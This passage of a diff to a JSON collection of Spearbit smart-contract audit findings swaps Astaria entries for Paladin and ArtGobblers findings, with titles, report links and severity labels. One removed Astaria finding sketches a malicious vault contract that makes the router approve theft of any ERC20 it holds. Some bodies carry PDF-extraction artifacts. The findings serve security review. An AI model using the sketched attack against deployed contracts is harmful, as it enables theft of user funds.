withdraw proxy's withdrawReserveReceived storage parameter to the total amount of assets it has received from either the public vault or the current withdraw proxy. An actor can manipulate Bn(cid:0)1 (cid:0) Wn(cid:0)1's value by sending assets to the public vault and the current withdraw proxy before calling transferWithdrawReserve ( Bn(cid:0)1 is the previous withdraw proxy's asset balance, Wn(cid:0)1 is previous withdraw proxy's withdrawReserveReceived and n is public vault's epoch). Bn(cid:0)1 (cid:0) Wn(cid:0)1 should really represent the sum of all near-boundary auction payment's the previous withdraw proxy receives plus any assets that are transferred to it by an external actor. Related Issue 46.", + "title": "Require statement with gauge_types function call is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The gauge_types function of the Curve reverts when an invalid gauge is given as a parameter, the QuestBoard: Invalid Gauge error message will not be seen in the QuestBoard contract. The documentation can be seen from the Querying Gauge and Type Weights. function createQuest(...) ... { ... require(IGaugeController(GAUGE_CONTROLLER).gauge_types(gauge) >= 0, \"QuestBoard: Invalid Gauge\"); ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "Update solc version and use unchecked in Uniswap related libraries", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The highlighted libraries above are referenced from Uniswap codebase which is intended to work with Solidity compiler <0.8. These older versions have unchecked arithmetic by default and the code takes it into account. Astaria code is intended to work with Solidity compiler >=0.8 which doesn't have unchecked arithmetic by default. Hence, to port the code, it has to be turned on via unchecked keyword. For example, FullMathUniswap.mulDiv(type(uint).max, type(uint).max, type(uint).max) reverts for v0.8, and returns type(uint).max for older version.", + "title": "Missing setter function for the GAUGE_CONTROLLER", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The GAUGE_CONTROLLER address is immutable and set in the constructor. If Curve adds a new version of the gauge controller, the value of GAUGE_CONTROLLER cannot be updated and the contract QuestBoard needs to be deployed again. address public immutable GAUGE_CONTROLLER; constructor(address _gaugeController, address _chest){ GAUGE_CONTROLLER = _gaugeController; ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "buyoutLien is prone to race conditions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "LienToken.buyoutLien and VaultImplementation.buyoutLien are both prone to race conditions where multiple vaults can try to front-run each others' buyoutLien call to end up registering their own lien. Also note, due to the storage values s.minInterestBPS and s.minDurationIncrease being used in the is- ValidRefinance, the winning buyoutLien call does not necessarily have to have the best rate or duration among the other candidates in the race.", + "title": "Empty events emitted in killBoard() and unkillBoard() functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "When an event is emitted, it stores the arguments passed in for the transaction logs. Currently the Killed() and Unkilled() events are emitted without any arguments passed into them defeating the purpose of using an event.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "ERC20-Cloned allows certain actions for address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In ERC20-Cloned, address(0) can be used as the: spender (spender) to parameter of transferFrom. to parameter of transfer. to parameter of _mint. from parameter of _burn. As an example, one can transfer or transferFrom to address(0) which would turn the amount of tokens unus- able but those not update the total supply in contrast to if _burn was called.", + "title": "The claimGobbler function does not enforce the MINTLIST_SUPPLY on-chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "There is a public constant MINTLIST_SUPPLY (2000) that is supposed to represent the number of gobblers that can be minted by using merkle proofs. However, this is not explicitly enforced in the claimGobbler function and will need to be verified off-chain from the list of merkle proof data. The risk lies in the possibility of having more than 2000 proofs.", "labels": [ "Spearbit", - "Astaria", + "ArtGobblers", "Severity: Low Risk" ] }, { - "title": "BEACON_PROXY_IMPLEMENTATION and WETH cannot be updated for AstariaRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There is no update mechanism for BEACON_PROXY_IMPLEMENTATION and WETH in AstariaRouter. It would make sense that one would want to keep WETH as not upgradable (unless we provide the wrong address to the constructor). But for BEACON_PROXY_IMPLEMENTATION there could be possibilities of potentially upgrading it.", + "title": "Feeding a gobbler to itself may lead to an infinite loop in the off-chain renderer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The contract allows feeding a gobbler to itself and while we do not think such action causes any issues on the contract side, it will nevertheless cause potential problems with the off-chain rendering for the gob- blers. The project explicitly allows feeding gobblers to other gobblers. In such cases, if the off-chain renderer is designed to render the inner gobbler, it would cause an infinite loop for the self-feeding case. Additionally, when a gobbler is fed to another gobbler the user will still own one of the gobblers. However, this is not the case with self-feeding,.", "labels": [ "Spearbit", - "Astaria", + "ArtGobblers", "Severity: Low Risk" ] }, { - "title": "Incorrect key parameter type is used for s.epochData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In PublicVault, whenever the epoch key provided is to the mapping s.epochData its type is uint64, but the type of s.epochData is mapping(uint256 => EpochData)", + "title": "The function toString() does not manage memory properly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "There are two issues with the toString() function: 1. It does not manage the memory of the returned string correctly. In short, there can be overlaps between memory allocated for the returned string and the current free memory. 2. It assumes that the free memory is clean, i.e., does not explicitly zero out used memory. Proof of concept for case 1: function testToStringOverwrite() public { string memory str = LibString.toString(1); uint freememptr; uint len; bytes32 data; uint raw_str_ptr; assembly { // Imagine a high level allocation writing something to the current free memory. // Should have sufficient higher order bits for this to be visible mstore(mload(0x40), not(0)) freememptr := mload(0x40) // Correctly allocate 32 more bytes, to avoid more interference mstore(0x40, add(mload(0x40), 32)) raw_str_ptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"memptr: \", freememptr); emit log_named_uint(\"str: \", raw_str_ptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); } Logs: memptr: : 256 str: : 205 len: : 1 data: : 0x31000000000000000000000000000000000000ffffffffffffffffffffffffff The key issue here is that the function allocates and manages memory region [205, 269) for the return variable. However, the free memory pointer is set to 256. The memory between [256, 269) can refer to both the string and another dynamic type that's allocated later on. Proof of concept for case 2: 5 function testToStringDirty() public { uint freememptr; // Make the next 4 bytes of the free memory dirty assembly { let dirty := not(0) freememptr := mload(0x40) mstore(freememptr, dirty) mstore(add(freememptr, 32), dirty) mstore(add(freememptr, 64), dirty) mstore(add(freememptr, 96), dirty) mstore(add(freememptr, 128), dirty) } string memory str = LibString.toString(1); uint len; bytes32 data; assembly { freememptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"str: \", freememptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); assembly { freememptr := mload(0x40) } emit log_named_uint(\"memptr: \", freememptr); } Logs: str: 205 len: : 1 data: : 0x31ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff memptr: : 256 In both cases, high level solidity will not have issues decoding values as this region in memory is meant to be empty. However, certain ABI decoders, notably Etherscan, will have trouble decoding them. Note: It is likely that the use of toString() in ArtGobblers will not be impacted by the above issues. However, these issues can become severe if LibString is used as a generic string library.", "labels": [ "Spearbit", - "Astaria", + "ArtGobblers", "Severity: Low Risk" ] }, { - "title": "buyoutLien, canLiquidate and makePayment have different notion of expired liens when considering edge cases", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When swapping a lien that is just expired (lien's end tend equals to the current timestamp tnow ), one can call buyoutLien to swap it out. But when tnow > tend , buyoutLien reverts due to the underflow in _- getRemainingInterest when calculating the buyout amount. This is in contrast to canLiquidate which allows a lien with tnow = tend to liquidate as well. makePayment also only considers tend < tnow as expired liens. So the expired/non-functional liens time ranges for different endpoints are: endpoint expired range buyoutLien canLiquidate makePayment (tend , 1) [tend , 1) (tend , 1)", + "title": "Consider migrating all require statements to Custom Errors for gas optimization, better UX, DX and code consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "There is a mixed usage of both require and Custom Errors to handle cases where the transaction must revert. We suggest replacing all require instances with Custom Errors in order to save gas and improve user / developer experience. The following is a list of contract functions that still use require statements: ArtGobblers mintLegendaryGobbler ArtGobblers safeBatchTransferFrom ArtGobblers safeTransferFrom SignedWadMath wadLn GobblersERC1155B balanceOfBatch GobblersERC1155B _mint GobblersERC1155B _batchMint PagesERC721 ownerOf PagesERC721 balanceOf PagesERC721 approve PagesERC721 transferFrom PagesERC721 safeTransferFrom PagesERC721 safeTransferFrom (overloaded version)", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Gas Optimization" ] }, { - "title": "Ensure all ratios are less than 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Although, numerators and denominators for different fees are set by admin, it's a good practice to add a check in the contract for absurd values. In this case, that would be when numerator is greater than denominator.", + "title": "Minting of Gobbler and Pages can be further gas optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Currently, in order to mint a new Page or Gobbler users must have enough $GOO in their Goo contract balance. If the user does not have enough $GOO he/she must call ArtGobblers.removeGoo(amount) to remove the required amount from the Gobbler's balance and mint new $GOO. That $GOO will be successively burned to mint the Page or Gobbler. In the vast majority of cases users will never have $GOO in the Goo contract but will have their $GOO directly stacked inside their Gobblers to compound and maximize the outcome. Given these premises, it makes sense to implement a function that does not require users to make two distinct transactions to perform: mint $GOO (via removeGoo). burn $GOO + mint the Page/Gobbler (via mintFromGoo). 7 but rather use a single transaction that consumes the $GOO stacked on the Gobbler itself without ever minting and burning any $GOO from the Goo contract. By doing so, the user will perform the mint operation with only one transaction and the gas cost will be much lower because it does not require any interaction with the Goo contract.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Gas Optimization" ] }, { - "title": "Factor out s.slope updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Slope updates occur in multiple locations but do not emit events.", + "title": "Declare GobblerReserve artGobblers as immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The artGobblers in the GobblerReserve can be declared as immutable to save gas. - ArtGobblers public artGobblers; + ArtGobblers public immutable artGobblers;", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Gas Optimization" ] }, { - "title": "External call to arbitrary address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The Router has a convenience function to commit to multiple liens AstariaRouter.commitToLiens. This function causes the router to receive WETH and allows the caller to supply an arbitrary vault address lien- Request.strategy.vault which is called by the router. This allows the potential for the caller to re-enter in the middle of the loop, and also allows them to drain any WETH that happens to be in the Router. In our review, no immediate reason for the Router to have WETH outside of commitToLiens calls was identified and therefore the severity of this finding is low.", + "title": "Neither GobblersERC1155B nor ArtGobblers implement the ERC-165 supportsInterface function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "From the EIP-1155 documentation: Smart contracts implementing the ERC-1155 standard MUST implement all of the functions in the ERC1155 interface. Smart contracts implementing the ERC-1155 standard MUST implement the ERC- 165 supportsInterface function and MUST return the constant value true if 0xd9b67a26 is passed through the interfaceID argument. Neither GobblersERC1155B nor ArtGobblers are actually implementing the ERC-165 supportsInterface function. implementing the required ERC-165 supportsInterface function in the", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Astaria's Seaport orders may not be listed on OpenSea", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "To list Seaport orders on OpenSea, the order should pass certain validations as described here(see OpenSea Order Validation). Currently, Astaria orders will fail this validation. For instance, zone and zoneHash values are not set as suggested.", + "title": "LogisticVRGDA is importing wadExp from SignedWadMath but never uses it", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The LogisticVRGDA is importing the wadExp function from the SignedWadMath library but is never used.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Any ERC20 held in the Router can be stolen using ERC4626RouterBase functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "All four functions in ERC4626RouterBase.sol take in a vault address, a to address, a shares amount, and a maxAmountIn for validation. The first step is to read vault.asset() and then approve the vault to spend the ERC20 at whatever address is returned for the given amount. function mint( IERC4626 vault, address to, uint256 shares, uint256 maxAmountIn ) public payable virtual override returns (uint256 amountIn) { ERC20(vault.asset()).safeApprove(address(vault), shares); if ((amountIn = vault.mint(shares, to)) > maxAmountIn) { revert MaxAmountError(); } } In the event that the Router holds any ERC20, a malicious user can design a contract with the following functions: function asset() view pure returns (address) { return [ERC20 the router holds]; } function mint(uint shares, address to) view pure returns (uint) { return 0; } If this contract is passed as the vault, the function will pass, and the router will approve this contract to control its holdings of the given ERC20.", + "title": "Pages.tokenURI does not revert when pageId is the ID of an invalid or not minted token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The current implementation of tokenURI in Pages is returning an empty string if the pageId specified by the user's input has not been minted yet (pageId > currentId). Additionally, the function does not correctly handle the case of a special tokenId equal to 0, which is an invalid token ID given that the first mintable token would be the one with ID equal to 1. The EIP-721 documentation specifies that the contract should revert in this case: Throws if _tokenId is not a valid NFT. URIs are defined in RFC 3986.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Inconsistency in byte size of maxInterestRate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In RouterStorage, maxInterestRate has a size of uint88. However, when being set from file(), it is capped at uint48 by the safeCastTo48() function.", + "title": "Consider checking if the token fed to the Gobbler is a real ERC1155 or ERC721 token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The current implementation of ArtGobblers.feedArt function allows users to specify from the value of the bool isERC1155 input parameter if the id passed is from an ERC721 or ERC1155 type of token. Without checking if the passed nft address fully support ERC721 or ERC1155 these two problems could arise: The user can feed to a Gobbler an arbitrary ERC20 token by calling gobblers.feedArt(1, address(goo), 100, false);. In this example, we have fed 100 $GOO to the gobbler. By just implementing safeTransferFrom or transferFrom in a generic contract, the user can feed tokens that cannot later be rendered by a Dapp because they do not fully support ERC721 or ERC1155 standard.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Router#file has update for nonexistent MinInterestRate variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "One of the options in the file() function is to update FileType.MinInterestRate. There are two problems here: 1) If someone chooses this FileType, the update actually happens to s.maxInterestRate. 2) There is no minInterestRate storage variable, as minInterestBPS is handled on L235-236.", + "title": "Rounding down in legendary auction leads to legendaryGobblerPrice being zero earlier than the auction interval", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The expression below rounds down. startPrice * (LEGENDARY_AUCTION_INTERVAL - numMintedSinceStart)) / LEGENDARY_AUCTION_INTERVAL In particular, this expression has a value 0 when numMintedSinceStart is between 573 and 581 (LEGENDARY_- AUCTION_INTERVAL).", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "getLiquidationWithdrawRatio() and getYIntercept() have incorrect return types", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "liquidationWithdrawRatio and yIntercept like other amount-related parameters are of type uint88 (uint88) and they are the returned values of getLiquidationWithdrawRatio() and getYIntercept() re- spectively. But the return type of getLiquidationWithdrawRatio() and getYIntercept() are defined as uint256.", + "title": "Typos in code comments or natspec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Below is a list of typos encountered in the code base and / or natspec comments: In both Pages.sol#L179 and Pages.sol#L188 replace compromise with comprise In Pages.sol#L205 replace pages's URI with page's URI In LogisticVRGDA.sol#L23 replace effects with affects In VRGDA.sol#L34 replace actions with auctions In ArtGobblers.sol#L54, ArtGobblers.sol#L745 and ArtGobblers.sol#L754 replace compromise with comprise In ArtGobblers.sol#L606 remove the double occurrence of the word state In ArtGobblers.sol#L871 replace emission's with emission In ArtGobblers.sol#L421 replace gobblers is minted with gobblers are minted and until all legen- daries been sold with until all legendaries have been sold In ArtGobblers.sol#L435-L436 replace gobblers where minted with gobblers were minted and if auc- tion has not yet started with if the auction has not yet started In ArtGobblers.sol#L518 replace overflow we've got bigger problems with overflow, we've got big- ger problems In ArtGobblers.sol#L775 and ArtGobblers.sol#L781 replace get emission emissionMultiple with get emissionMultiple", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "The modified implementation of redeem is omitting a check to make sure not to redeem 0 assets.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The modified implementation of redeem is omitting the check // Check for rounding error since we round down in previewRedeem. require((assets = previewRedeem(shares)) != 0, \"ZERO_ASSETS\"); You can see a trail of it in redeemFutureEpoch.", + "title": "Missing natspec comments for contract's constructor, variables or functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Some of the contract's constructor variables and functions are missing natespec comments. Here is the full list of them: Pages constructor Pages getTargetSaleDay function LibString toString function MerkleProofLib verify function SignedWadMath toWadUnsafe function SignedWadMath unsafeWadMul function SignedWadMath unsafeWadDiv function SignedWadMath wadMul function SignedWadMath wadDiv function SignedWadMath wadExp function SignedWadMath wadLn function SignedWadMath unsafeDiv function VRGDA constructor LogisticVRGDA constructor LogisticVRGDA getTargetDayForNextSale PostSwitchVRGDA constructor PostSwitchVRGDA getTargetDayForNextSale GobblerReserve artGobblers GobblerReserve constructor GobblersERC1155B contract is missing natspec's coverage for most of the variables and functions PagesERC721 contract is missing natspec's coverage for most of the variables and functions PagesERC721 isApprovedForAll should explicity document the fact that the ArtGobbler contract is always pre-approved ArtGobblers chainlinkKeyHash variable ArtGobblers chainlinkFee variable ArtGobblers constructor ArtGobblers gobblerPrice miss the @return natspec ArtGobblers legendaryGobblerPrice miss the @return natspec ArtGobblers requestRandomSeed miss the @return natspec ArtGobblers fulfillRandomness miss both the @return and @param natspec ArtGobblers uri miss the @return natspec ArtGobblers gooBalance miss the @return natspec ArtGobblers mintReservedGobblers miss the @return natspec ArtGobblers getGobblerEmissionMultiple miss the @return natspec 11 ArtGobblers getUserEmissionMultiple miss the @return natspec ArtGobblers safeBatchTransferFrom miss all natspec ArtGobblers safeTransferFrom miss all natspec ArtGobblers transferUserEmissionMultiple miss @notice natspec", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "PublicVault's redeem and redeemFutureEpoch always returns 0 assets.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "assets returned by redeem and redeemFutureEpoch will always be 0, since it has not been set in redeemFutureEpoch. Also Withdraw event emits an incorrect value for asset because of this. The issue stems from trying to consolidate some of the logic for redeem and withdraw by using redeemFutureEpoch for both of them.", + "title": "Potential issues due to slippage when minting legendary gobblers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The price of a legendary mint is a function of the number of gobblers minted from goo. Because of the strict check that the price is exactly equal to the number of gobblers supplied, this can lead to slippage issues. That is, if there is a transaction that gets mined in the same block as a legendary mint, and before the call to mintLegendaryGobbler, the legendary mint will revert. uint256 cost = legendaryGobblerPrice(); if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost);", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "OWNER() cannot be updated for private or public vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "owner() is an immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVault- Base. That means for example if there is an issue with the current hardcoded owner() there is no way to update it and liquidities/assets in the public/private vaults would also be at risk.", + "title": "Users who claim early have an advantage in goo production", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The gobblers are revealed in ascending order of the index in revealGobblers. However, there can be cases when this favours users who were able to claim early: 1. There is the trivial case where a user who claimed a day earlier will have an advantage in gooBalance as their emission starts earlier. 2. For users who claimed the gobblers on the same day (in the same period between a reveal) the advantage depends on whether the gobblers are revealed in the same block or not. 1. If there is a large number of gobbler claims between two aforementioned gobblers, then it may not be possible to call revealGobblers, due to block gas limit. 2. A user at the beginning of the reveal queue may call revealGobblers for enough indices to reveal their gobbler early. In all of the above cases, the advantage is being early to start the emission of the Goo.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "ROUTER() can not be updated for private or public vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "ROUTER() is an immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVault- Base. That means for example if there is an issue with the current hardcoded ROUTER() or that it needs to be upgraded, the current public/private vaults would not be able to communicate with the new ROUTER.", + "title": "Add a negativity check for decayConstant in the constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Price is designed to decay as time progresses. For this, it is important that the constant decayCon- stant is negative. Since the value is derived using an on-chain logarithm computation once, it is useful to check that the value is negative. Also, typically decay constant is positive, for example, in radioactive decay the negative sign is explicitly added in the function. It is worth keeping the same convention here, i.e., keep decayConstant as a positive number and add the negative sign in getPrice function. However, this may cause a small increase in gas and therefore may not be worth implementing in the end.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Wrong return parameter type is used for getOwed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Both variations of getOwed use _getOwed and return uint192. But _getOwed returns a uint88.", + "title": "Consideration on possible Chainlink integration concerns", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The ArtGobbler project relies on the Chainlink v1 VRF service to reveal minted gobblers and assign a random emissionMultiple that can range from 6 to 9. The project has estimated that minting and revealing all gobblers will take about 10 years. In the scenario simulated by the discussion \"Test to mint and reveal all the gobblers\" the number of requestRan- domSeed and fulfillRandomness made to reveal all the minted gobblers were more than 1500. Given the timespan of the project, the number of requests made to Chainlink to request a random number and the fundamental dependency that Chainlink VRF v1 has, we would like to highlight some concerns: What would happen if Chainlink completely discontinues the Chainlink VRF v1? At the current moment, Chainlink has already released VRF v2 that replaces and enhances VRF v1. What would happen in case of a Chainlink service outage and for some reason they decide not to pro- cess previous requests? Currently, the ArtGobbler contract does not allow to request a new \"request for randomness\". 13 What if the fulfillRandomness always gets delayed by a long number of days and users are not able to reveal their gobblers? This would not allow them to know the value of the gobbler (rarity and the visual representation) and start compounding $GOO given the fact that the gobbler does not have an emission multiple associated yet. What if for error or on purpose (malicious behavior) a Chainlink operator calls fulfillRandomness multi- ple times changing the randomSeed during a reveal phase (the reveal of X gobbler can happen in multiple stages)?", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Document and reason about which functionalities should be frozen on protocol pause", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "On protocol pause, a few functions are allowed to be called. Some instances are noted above. There is no documentation on why these functionalities are allowed while the remaining functions are frozen.", + "title": "The function toString() does not return a string aligned to a 32-byte word boundary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "It is a good practice to align memory regions to 32-byte word boundaries. This is not necessarily the case here. However, we do not think this can lead to issues.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Wrong parameter type is used for s.strategyValidators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "s.strategyValidators is of type mapping(uint32 => address) but the provided TYPE in the con- text is of type uint8.", + "title": "Considerations on Legendary Gobbler price mechanics", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The auction price model is made in a way that starts from a startPrice and decays over time. Each time a new action starts the price time will be equal to max(69, prevStartPrice * 2). Users in this case are incentivized to buy the legendary gobbler as soon as the auction starts because by doing so they are going to burn the maximum amount allowed of gobblers, allowing them to maximize the final emission multiple of the minted legendary gobbler. By doing this, you reach the end goal of maximizing the account's $GOO emissions. By waiting, the cost price of the legendary gobbler decays, and it also decays the emission multiple (because you can burn fewer gobblers). This means that if a user has enough gobblers to burn, he/she will burn them as soon as the auction starts. Another reason to mint a legendary gobbler as soon as the auction starts (and so burn as many gobblers as possible) is to make the next auction starting price as high as possible (always for the same reason, to be able to maximize the legendary gobbler emissions multiple). The next auction starting price is determined by legendaryGobblerAuctionData.startPrice = uint120(cost < 35 ? 69 : cost << 1); These mechanisms and behaviors can result in the following consequences: Users that will have a huge number of gobblers will burn them as soon as possible, disallowing others that can't afford it to wait for the price to decay. There will be less and less \"normal\" gobblers available to be used as part of the \"art\" aspect of the project. In the discussion \"Test to mint and reveal all the gobblers\" we have simulated a scenario in which a whale would be interested to collect all gobblers with the end goal of maximizing $GOO production. In that scenario, when the last Legendary Gobbler is minted we have estimated that 9644 gobbler have been burned to mint all the legendaries. 14", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Some functions do not emit events, but they should", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "AstariaRouter.sol#L268 : Other filing endpoints in the same contract and also CollateralToken and LienToken emit FileUpdated(what, data). But fileGuardian does not.", + "title": "Define a LEGENDARY_GOBBLER_INITIAL_START_PRICE constant to be used instead of hardcoded 69", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "69 is currently the starting price of the first legendary auction and will also be the price of the next auction if the previous one (that just finished) was lower than 35. There isn't any gas benefit to use a constant variable but it would make the code cleaner and easier to read instead of having hard-coded values directly.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "setNewGuardian can be changed to a 2 or 3 step transfer of authority process", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The current guardian might pass a wrong _guardian parameter to setNewGuardian which can break the upgradability of the AstariaRouter using fileGuardian.", + "title": "Update ArtGobblers comments about some variable/functions to make them more clear", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Some comments about state variables or functions could be improved to make them clearer or remove any further doubts. LEGENDARY_AUCTION_INTERVAL /// @notice Legendary auctions begin each time a multiple of these many gobblers have been minted. It could make sense that this comment specifies \"minted from Goo\" otherwise someone could think that also the \"free\" mints (mintlist, legendary, reserved) could count to determine when a legendary auction start. EmissionData.lastTimestamp // Timestamp of last deposit or withdrawal. These comments should be updated to cover all the scenarios where lastBalance and lastTimestamp are up- dated. Currently, they are updated in many more cases for example: mintLegendaryGobbler revealGobblers transferUserEmissionMultiple getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) has an outdated comment. The current present in the mintLegendaryGobbler function has the following comment: line getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) // Must be done before minting as the transfer hook will update the user's emissionMultiple. In both ArtGobblers and GobblersERC1155B there isn't any transfer hook, which could mean that the referred comment is referencing outdated code. We suggest removing or updating the comment to reflect the current code implementation. legendaryGobblerPrice numMintedAtStart calculation. 15 The variable numMintedAtStart is calculated as (numSold + 1) * LEGENDARY_AUCTION_INTERVAL The comment above the formula does not explain why it uses (numSold + 1) instead of numSold. This reason is correctly explained by a comment on 